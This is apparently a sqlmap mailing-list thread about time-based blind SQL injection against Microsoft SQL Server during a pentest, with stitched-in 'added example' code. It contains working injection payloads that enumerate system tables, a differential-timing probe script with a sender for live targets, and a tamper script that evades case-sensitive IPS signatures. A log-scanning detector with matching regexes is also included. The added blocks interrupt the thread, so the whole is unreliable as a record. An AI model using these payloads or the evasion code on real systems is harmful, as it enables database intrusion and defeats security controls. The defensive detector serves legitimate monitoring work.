Thread: [sqlmap-users] number of databases/tables problems
Brought to you by:
inquisb
From: floyd <flo...@ya...> - 2014-09-23 14:26:53
Hi everybody,

I'm doing a pentest and I'm able to do a time-based blind SQL injection on a very big database. It takes some time, but that's fine for now. But sqlmap is failing when it comes to retrieving the *number of [databases, tables, columns, whatever]*:

$ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p "redactedParameter" --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3 --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
[...snip...]
[11:57:49] [INFO] confirming Microsoft SQL Server
[11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.X.XXXXX (redacted)
back-end DBMS: Microsoft SQL Server 2008
[11:57:49] [INFO] fetching database names
[11:57:49] [INFO] fetching number of databases
[11:57:49] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
[11:57:49] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
[11:58:25] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
[11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
[11:59:55] [INFO] retrieved:
[11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
[11:59:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:59:55] [ERROR] unable to retrieve the number of databases

However, for the *database names* sqlmap will continue with the DB_NAME(X) technique. Right now it is dumping out all the different database names, which works fine:

[15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109) WAITFOR DELAY '0:0:2'; --

Because I got many of the following errors (and the occurrence of the error is random), I patched the time delay in the Python code to be fixed to 2 seconds (maybe you want to have an option for that):

[15:03:14] [ERROR] invalid character detected. retrying..
[15:03:14] [WARNING] increasing time delay to 3 seconds

That works fine and I get good results. However, when I try to dump table names now (from one of the known databases) with the -D DB_NAME and --tables switch, it is again failing to retrieve the number of tables:

[14:51:53] [INFO] fetching tables for database: DB_NAME
[14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
[14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66) WAITFOR DELAY '0:0:10'; --
[14:51:53] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[14:52:26] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97) WAITFOR DELAY '0:0:10'; --
[14:52:56] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101) WAITFOR DELAY '0:0:10'; --
[14:54:56] [INFO] retrieved:
[14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
[...]
[14:57:27] [INFO] retrieved:
[14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
[...]
[14:59:57] [INFO] retrieved:
[14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
[14:59:57] [WARNING] unable to retrieve the number of tables for database 'DB_NAME'
[14:59:57] [CRITICAL] unable to retrieve the tables for any database

Any suggestions? Using higher --time-sec, --hex or --no-cast didn't help. Using --start and --stop also didn't work. I can't get any data out of it like this.

Best regards,
floyd
From: Miroslav S. <mir...@gm...> - 2014-09-24 11:04:05
Hi.

This looks like a permission problem while reading system tables. That would explain why DB_NAME() works and everything else fails.

Bye

_______________________________________________
sqlmap-users mailing list
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
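A check that separates the two explanations in play in this thread (the system-table permission hypothesis in the reply above, and the filter that floyd identifies further down): send conditions that differ only in whether they contain SELECT and whether they read a system table, and compare the delays. This is an added example, not code from the thread or from sqlmap. The prefix, suffix and 2-second delay are copied from the sqlmap invocation in the original post; the target URL and parameter name taken by http_sender, and the simulated target used so the script runs offline, are assumptions. Note that the DB_NAME() payload that did work also contains SELECT, so the probes do not stop at the first SELECT test but also try a case-swapped system-table read.

```python
"""Differential timing probes for a time-based blind MSSQL injection.

Added example (not from the thread or sqlmap): tells a system-table
permission problem apart from an inline filter dropping SELECT.
"""
import re
import statistics
import time
import urllib.parse
import urllib.request

DELAY = 2.0                      # seconds, as --time-sec=2 in the thread
PREFIX, SUFFIX = "';", "; --"    # as --prefix="';" --suffix="; --"


def payload(condition):
    """Stacked query that sleeps DELAY seconds only if `condition` is true."""
    return "%s IF(%s) WAITFOR DELAY '0:0:%d'%s" % (PREFIX, condition, int(DELAY), SUFFIX)


# Same shape as sqlmap's payloads; they differ only in SELECT / system-table use.
PROBE_NO_SELECT = payload("1=1")
PROBE_SELECT = payload("(SELECT 1)=1")
PROBE_SYSTABLE = payload("(SELECT COUNT(name) FROM master..sysdatabases)>0")


def case_swap(p):
    """The thread's caseselect trick, applied to every SELECT in any case."""
    return re.sub(r"\bselect\b", "sElEcT", p, flags=re.IGNORECASE)


def diagnose(send, delay=DELAY, samples=3):
    """send(payload) -> response time in seconds. Returns a verdict string.

    Each probe is repeated and the median compared, because a single
    time-based sample is noisy (the lag warning in the log above).
    """
    def slept(p):
        return statistics.median(send(p) for _ in range(samples)) >= delay

    if not slept(PROBE_NO_SELECT):
        return "no delay even without SELECT: injection, prefix or suffix is wrong"
    if not slept(PROBE_SELECT):
        if slept(case_swap(PROBE_SELECT)):
            return "keyword filter on SELECT: mixed case passes, use a tamper"
        return "SELECT blocked in any case: try encoding tampers or other syntax"
    if slept(PROBE_SYSTABLE):
        return "system tables readable: suspect timing jitter, raise --time-sec"
    if slept(case_swap(PROBE_SYSTABLE)):
        return "filter on the system-table query (SELECT ... FROM master..), not permissions"
    return "system-table read fails in any case: permission problem (or a smarter filter)"


def http_sender(url, param, timeout=30.0):
    """Real sender: POST param=<payload> to url and return elapsed seconds.

    url and param are assumptions; take them from the captured request.
    A connection reset by an IPS raises and is counted as a fast response.
    """
    def send(p):
        data = urllib.parse.urlencode({param: p}).encode()
        start = time.monotonic()
        try:
            urllib.request.urlopen(url, data=data, timeout=timeout).read()
        except Exception:
            pass
        return time.monotonic() - start
    return send


def simulated_target(drop_pattern, can_read_systables):
    """Constructed stand-in for the web application so the example runs offline.

    It evaluates no SQL; it only models the two failure modes under discussion.
    """
    def send(p):
        if drop_pattern and re.search(drop_pattern, p):   # case-sensitive, like the IPS
            return 0.05                                    # connection dropped at once
        if "sysdatabases" in p and not can_read_systables:
            return 0.1                                     # batch aborts on permission error
        return DELAY + 0.2                                 # WAITFOR fired, plus jitter
    return send


if __name__ == "__main__":
    for label, target in [("IPS on SELECT", simulated_target(r"SELECT", True)),
                          ("IPS on SELECT..FROM", simulated_target(r"SELECT .* FROM", True)),
                          ("no permission", simulated_target(None, False)),
                          ("healthy", simulated_target(None, True))]:
        print("%-20s -> %s" % (label, diagnose(target)))
```

Against a real target, replace simulated_target(...) with http_sender(url, param) built from the captured request. One caveat: an IPS that silently drops packets instead of resetting the connection makes the request hang until the timeout, which then looks like a delay, so compare every verdict against a plain baseline request as well.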
From: floyd <flo...@ya...> - 2014-09-25 13:17:45
Hi Miroslav,

Thanks for your time and for sqlmap. I hope you got the donation :)

By now I figured out what it was: an IPS. Had to --tamper=caseselect,charencode where caseselect is just a simple .replace("SELECT","sElEcT"). What a stupid IPS.

Is there any way to correct errors that sqlmap is getting? I sometimes have an extra character at the end of table names and would like to correct that.

And: Is there a possibility to tell sqlmap manually which columns a table has? That would be very helpful for blind time-based, because, well, it takes forever :)

Btw. awesome resume feature on ^C!

Best,
floyd
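The caseselect tamper that the message above describes in one line, written out in sqlmap's tamper-script format as an added example (not floyd's actual file and not part of sqlmap). Drop it into sqlmap's tamper/ directory as caseselect.py and chain it as in the message (--tamper=caseselect,charencode). The interface (a module-level __priority__, dependencies() and tamper(payload, **kwargs)) is sqlmap's; the KEYWORDS tuple and the alternate_case helper are this example's own. sqlmap's bundled randomcase tamper covers similar ground with random case across all keywords.

```python
#!/usr/bin/env python
"""caseselect.py: sqlmap tamper script (added example, see lead-in).

Replaces every SELECT keyword with sElEcT so a case-sensitive signature,
such as the IPS in the thread, no longer matches, while SQL Server, whose
keywords are case-insensitive, still executes the query.
"""
import re

# sqlmap sorts chained tamper scripts by this value. A plain int is used so
# the file also imports outside sqlmap; inside sqlmap the usual idiom is
# PRIORITY.NORMAL from lib.core.enums.
__priority__ = 0

# Keywords to mangle. Extend (e.g. "FROM", "WAITFOR") if the filter matches
# more than SELECT. This tuple is an assumption of the example, not a sqlmap setting.
KEYWORDS = ("SELECT",)


def dependencies():
    """sqlmap calls this once per tamper; nothing to check or warn about here."""
    pass


def alternate_case(word):
    """'SELECT' -> 'sElEcT': lower/upper alternating, the pattern from the thread."""
    return "".join(c.lower() if i % 2 == 0 else c.upper() for i, c in enumerate(word))


def tamper(payload, **kwargs):
    """Entry point sqlmap calls for every payload; returns the modified payload.

    Word boundaries keep identifiers such as SELECTED or selection untouched.
    """
    if not payload:
        return payload
    for kw in KEYWORDS:
        payload = re.sub(r"\b%s\b" % re.escape(kw), alternate_case(kw),
                         payload, flags=re.IGNORECASE)
    return payload


if __name__ == "__main__":
    # The failing payload from the original post, after tampering.
    original = ("'; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) "
                "AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>51) "
                "WAITFOR DELAY '0:0:2'; --")
    print(tamper(original))
```

Run sqlmap with -v 3 and confirm the [PAYLOAD] lines leave with sElEcT before charencode's URL encoding is applied. If the filter also keys on FROM or on system-table names (the DB_NAME() payload that worked in the original post contains SELECT too, so SELECT alone may not be the whole signature), add those words to KEYWORDS.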
From: Rodrigo Z. S. <rod...@gm...> - 2014-09-25 18:04:10
Well, about the column, it is possible, I think; use the

> -D DB DBMS database to enumerate
> -T TBL DBMS database table(s) to enumerate
> -C COL DBMS database table column(s) to enumerate
> -X EXCLUDECOL DBMS database table column(s) to not enumerate
> -U USER DBMS user to enumerate

I really think the -C will search your column. There is a brute force for common columns (or was it tables?). Anyway, set your column and it will accept it.
From: Miroslav S. <mir...@gm...> - 2014-09-25 19:11:21
As Rodrigo stated correctly, you can use -C to specify column names manually. For forcing sqlmap to requery certain results you can use --fresh-queries. Bye p.s. thx for donation :) p.p.s. I am glad that you managed to use tamper scripts to bypass IPS/WAF On Sep 25, 2014 8:04 PM, "Rodrigo Zanatta Silva" < rod...@gm...> wrote: > well, about the column, it is possible, I think, use the > >> -D DB DBMS database to enumerate >> -T TBL DBMS database table(s) to enumerate >> -C COL DBMS database table column(s) to enumerate >> -X EXCLUDECOL DBMS database table column(s) to not enumerate >> -U USER DBMS user to enumerate > > I really think the -C will search your column. There are a brutal force > for common column (or was table?) Anyway, set your colum and it will > accept. > > 2014-09-25 10:17 GMT-03:00 floyd <flo...@ya...>: > >> Hi Miroslav >> >> Thanks for your time and for sqlmap. I hope you got the donation :) >> >> By now I figured out what it was: an IPS. Had to >> --tamper=caseselect,charencode where caseselect is just a simple >> .replace("SELECT","sElEcT"). What a stupid IPS. >> >> Is there any way to correct errors that sqlmap is getting? I sometimes >> have an extra character at the end of table names and would like to >> correct that. >> >> And: Is there a possibility to tell sqlmap manually, which columns a >> table has? That would be very helpful for blind time based, because, >> well, it takes forever :) >> >> Btw. awesome resume feature on ^C ! >> >> Best, >> floyd >> >> On 24/09/14 13:03, Miroslav Stampar wrote: >> > Hi. >> > >> > This looks like a permission problem while reading system tables. That >> > would explain why DB_NAME() works and everything else fails. >> > >> > Bye >> > >> > On Sep 23, 2014 4:27 PM, "floyd" <flo...@ya... >> > <mailto:flo...@ya...>> wrote: >> > >> > Hi everybody >> > >> > I'm doing a Pentest and I'm able to do a time based blind sql >> injection >> > on a very big database. 
>> > It takes some time, but that's fine for now. But sqlmap is failing when
>> > it comes to retrieving the *number of [databases, tables, columns,
>> > whatever]*:
>> >
>> > $ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p "redactedParameter" --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3 --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
>> > [...snip...]
>> > [11:57:49] [INFO] confirming Microsoft SQL Server
>> > [11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
>> > web server operating system: Windows
>> > web application technology: ASP.NET, ASP.NET 2.X.XXXXX (redacted)
>> > back-end DBMS: Microsoft SQL Server 2008
>> > [11:57:49] [INFO] fetching database names
>> > [11:57:49] [INFO] fetching number of databases
>> > [11:57:49] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
>> > [11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
>> > [11:57:49] [WARNING] time-based comparison requires larger statistical model, please wait..............................
>> > [11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
>> > [11:58:25] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
>> > [11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
>> > [11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
>> > [11:59:55] [INFO] retrieved:
>> > [11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
>> > [11:59:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
>> > [11:59:55] [ERROR] unable to retrieve the number of databases
>> >
>> > However, for the *database names* sqlmap will continue with the
>> > DB_NAME(X) technique. Right now it is dumping out all the different
>> > database names, which works fine:
>> >
>> > [15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109) WAITFOR DELAY '0:0:2'; --
>> >
>> > Because I got many of the following errors (and the occurrence of the
>> > error is random), I patched the time delay in the python code to be
>> > fixed to 2 seconds (maybe you want to have an option for that):
>> >
>> > [15:03:14] [ERROR] invalid character detected. retrying..
>> > [15:03:14] [WARNING] increasing time delay to 3 seconds
>> >
>> > That works fine and I get good results. However, when I try to dump
>> > table names now (from one of the known databases) with the -D DB_NAME
>> > and --tables switch, it is again failing to retrieve the number of
>> > tables:
>> >
>> > [14:51:53] [INFO] fetching tables for database: DB_NAME
>> > [14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
>> > [14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66) WAITFOR DELAY '0:0:10'; --
>> > [14:51:53] [WARNING] time-based comparison requires larger statistical model, please wait..............................
>> > [14:52:26] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
>> > [14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97) WAITFOR DELAY '0:0:10'; --
>> > [14:52:56] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
>> > [14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101) WAITFOR DELAY '0:0:10'; --
>> > [14:54:56] [INFO] retrieved:
>> > [14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
>> > [...]
>> > [14:57:27] [INFO] retrieved:
>> > [14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
>> > [...]
>> > [14:59:57] [INFO] retrieved:
>> > [14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
>> > [14:59:57] [WARNING] unable to retrieve the number of tables for database 'DB_NAME'
>> > [14:59:57] [CRITICAL] unable to retrieve the tables for any database
>> >
>> > Any suggestions? Using higher --time-sec, --hex or --no-cast didn't
>> > help. Using --start and --stop also didn't work. I can't get any data
>> > out of it like this.
>> >
>> > Best regards,
>> > floyd
>> >
>> > ------------------------------------------------------------------------------
>> > Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
>> > Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
>> > Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
>> > Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>> > http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
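The payloads quoted in the thread have a recognisable shape on the wire: a `UNICODE(SUBSTRING(...))` comparison against a system catalog (`master..sysdatabases`, `DB_NAME..sysobjects`) or a `DB_NAME(n)` lookup, followed by `WAITFOR DELAY`, and, when the guessed comparison holds, a response that takes about `--time-sec` longer than normal. The following is an added example, not code from the thread or from the sqlmap project, showing how a defender can pick these requests out of web server logs and correlate them with the observed delay. The log format (time, client, method, URI stem, query string, status, time-taken in ms) and the four sample lines are constructed for the example; the 2000 ms threshold is an assumption tied to the `--time-sec=2` used in the thread, and a real deployment would derive it from the site's normal latency.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log (W3C-style fields: time client method uri-stem
# query status time-taken-ms). Lines 2 and 3 carry URL-encoded copies of the
# two payload shapes quoted in the thread; lines 1 and 4 are ordinary traffic.
SAMPLE_LOG = """\
12:00:01 203.0.113.7 GET /search.aspx q=shoes 200 41
12:00:02 203.0.113.7 GET /search.aspx q=shoes%27%3B+IF%28UNICODE%28SUBSTRING%28%28SELECT+ISNULL%28CAST%28LTRIM%28STR%28COUNT%28name%29%29%29+AS+NVARCHAR%284000%29%29%2CCHAR%2832%29%29+FROM+master..sysdatabases%29%2C1%2C1%29%29%3E51%29+WAITFOR+DELAY+%270%3A0%3A2%27%3B+-- 200 2044
12:00:05 203.0.113.7 GET /search.aspx q=shoes%27%3B+IF%28UNICODE%28SUBSTRING%28%28SELECT+ISNULL%28CAST%28DB_NAME%28110%29+AS+NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C16%2C1%29%29%21%3D109%29+WAITFOR+DELAY+%270%3A0%3A2%27%3B+-- 200 39
12:00:09 198.51.100.4 GET /search.aspx q=boots 200 37
"""

# Signatures for the MSSQL time-based payload shapes seen in the thread.
# Case-insensitive: T-SQL keywords are not case sensitive and tamper scripts
# may change case.
SIGNATURES = {
    "waitfor_delay": re.compile(r"WAITFOR\s+DELAY", re.I),
    "unicode_substring": re.compile(r"UNICODE\s*\(\s*SUBSTRING\s*\(", re.I),
    "system_catalog": re.compile(r"\.\.sys(databases|objects)\b", re.I),
    "varbin_hex": re.compile(r"fn_varbintohexstr", re.I),
    "db_name_enum": re.compile(r"DB_NAME\s*\(\s*\d+\s*\)", re.I),
}

# Assumed threshold: a response slower than this is treated as having honoured
# the WAITFOR (the thread uses --time-sec=2). Tune from normal latency.
DELAY_MS = 2000


def parse_line(line):
    """Split one constructed log line into a dict; return None if malformed."""
    parts = line.split()
    if len(parts) != 7:
        return None
    time, client, method, stem, query, status, taken = parts
    return {"time": time, "client": client, "method": method, "stem": stem,
            "query": unquote_plus(query),  # decode before matching
            "status": int(status), "time_taken_ms": int(taken)}


def inspect(line_no, rec):
    """Return a finding if the decoded query matches any signature, else None."""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(rec["query"])]
    if not hits:
        return None
    return {"line": line_no, "client": rec["client"], "rules": hits,
            "delay_observed": rec["time_taken_ms"] >= DELAY_MS}


def scan(log_text):
    """Run every parsable line through the signatures; skip malformed lines."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        finding = inspect(n, rec)
        if finding:
            findings.append(finding)
    return findings


def summarize(findings):
    """Per-client counts: injection-shaped requests and how many showed the delay."""
    total, delayed = Counter(), Counter()
    for f in findings:
        total[f["client"]] += 1
        if f["delay_observed"]:
            delayed[f["client"]] += 1
    return {c: {"requests": total[c], "delayed": delayed[c]} for c in total}


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(h)
    print(summarize(hits))
```

The `delay_observed` flag matters because a blind time-based run produces a long series of such requests from one client, only some of which trigger the delay; counting both per client separates a real inference run (many signature hits, a fraction of them slow) from a single scanner probe. The same rules can be fed to a WAF or SIEM as-is, and the `fn_varbintohexstr` pattern covers the `--hex` variant that appears later in the thread.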
